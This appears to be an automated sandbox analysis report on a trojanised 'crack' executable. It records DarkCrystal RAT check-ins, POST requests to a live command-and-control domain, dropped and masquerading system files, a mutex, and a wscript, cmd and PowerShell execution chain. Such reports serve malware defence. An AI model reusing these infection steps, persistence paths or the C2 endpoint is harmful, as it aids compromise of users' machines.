Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows NT\69ddcba757bf72	Jump to behavior

Source: NursultanAlphaCrack.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NursultanAlphaCrack.bat.exe
Source:	Binary string: 5c561934e089\System.pdb source: smss.exe, 00000032.00000002.2216710248.000000001BED2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_001CA69B
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_001DC220
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001EB348 FindFirstFileExA,	0_2_001EB348

Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52220 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52271 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52278 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52270 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52273 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49882 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52277 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52276 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52274 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52280 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52279 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52272 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52275 -> 104.21.48.1:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic

TCP traffic: 192.168.2.9:52212 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: 237025cm.n9shteam.in
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:17:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv6AXVENQPFAg%2BT52K2QdTC7osc7Ath%2F3eelVnd%2FeVxxC49VFN8lpuS6BPS3bbSWnipcpvPOWV9z%2F2nJ1IjbZIWPe4Fe6vkkmrgEnT99vReBAb0eqGnp5vBV70Rmy%2Fkpk4rGiDkNKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015526b3feac443-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2886&min_rtt=1686&rtt_var=3033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=129329&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:17:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fs90pKoEXzLjXiSDTycAoqO2ZJm4jnTr8TwTqDY7%2F96d4%2F5Ycyz%2B63SfLQxmyUGdJYMNWxBWy2%2BdRKNbpcrKxSsdw2AiwPPPmjooin4Xj%2FqDZ%2F%2F0EgHdHjYDpjD4i%2BwLEVmpLFEbjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015529edc7a7d0e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4043&min_rtt=1920&rtt_var=4967&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=77211&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Source: GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://237025cm.n9shteam.in
Source: smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://237025cm.n9shteam.in/
Source: GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://237025cm.n9shteam.in/UpdatesqlCdn.php
Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BlockcontainerWin.exe, 00000005.00000002.1496547817.0000000003B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.2983617268.0000023D3C516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2984347585.000002C598DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2966511703.000001FE26B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001C6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_001C6FAA

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001C848E	0_2_001C848E
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D4088	0_2_001D4088
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D00B7	0_2_001D00B7
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001C40FE	0_2_001C40FE
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D7153	0_2_001D7153
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001E51C9	0_2_001E51C9
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D62CA	0_2_001D62CA
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001C32F7	0_2_001C32F7
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D43BF	0_2_001D43BF
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CC426	0_2_001CC426
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001ED440	0_2_001ED440
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CF461	0_2_001CF461
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D77EF	0_2_001D77EF
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001C286B	0_2_001C286B
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001ED8EE	0_2_001ED8EE
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CE9B7	0_2_001CE9B7
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001F19F4	0_2_001F19F4
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D6CDC	0_2_001D6CDC
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001D3E0B	0_2_001D3E0B
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001E4F9A	0_2_001E4F9A
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CEFE2	0_2_001CEFE2
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D80830	50_2_00007FF887D80830
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D922AB	50_2_00007FF887D922AB
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887D92323	50_2_00007FF887D92323
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887DA0A25	50_2_00007FF887DA0A25
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887DB0FD3	50_2_00007FF887DB0FD3
Source: C:\Program Files\Windows NT\smss.exe	Code function: 50_2_00007FF887DB0F61	50_2_00007FF887DB0F61
Source: C:\Program Files\Windows NT\smss.exe	Code function: 55_2_00007FF887D50D78	55_2_00007FF887D50D78

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BAOTDPUV.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: String function: 001DEB78 appears 39 times
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: String function: 001DF5F0 appears 31 times
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: String function: 001DEC50 appears 56 times

Source: ZFTyARuY.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JDNtgNEK.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qmbOMItv.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gDHycgoN.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: lhCxVqkE.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: medFrqzz.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: USBzXUek.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BAOTDPUV.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sXGeTWEn.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: Rfxshdov.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ssnNFABl.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: blWilNVX.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oCwXyDAs.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: VlKreyqd.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DYilKdVO.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: kHvGrYKy.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JRLLnIaC.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rEjFTmFn.log.38.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BwtLSSWj.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: EErUokRe.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uQMeEZWw.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BOAdhoQl.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rfhNxLLD.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZTFIdpqp.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OfbStevG.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wSzMZIas.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: npqXqOLK.log.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: NursultanAlphaCrack.bat.exe

Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs NursultanAlphaCrack.bat.exe

Source: NursultanAlphaCrack.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@58/78@3/1

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001C6C74 GetLastError,FormatMessageW,

0_2_001C6C74

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001DA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_001DA6C2

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

File created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe

Jump to behavior

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

File created: C:\Users\user\Desktop\lhCxVqkE.log

Jump to behavior

Source: C:\Program Files\Windows NT\smss.exe	Mutant created: NULL
Source: C:\Program Files\Windows NT\smss.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2024:120:WilError_03

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

File created: C:\Users\user\AppData\Local\Temp\4PyWtYxh61

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "

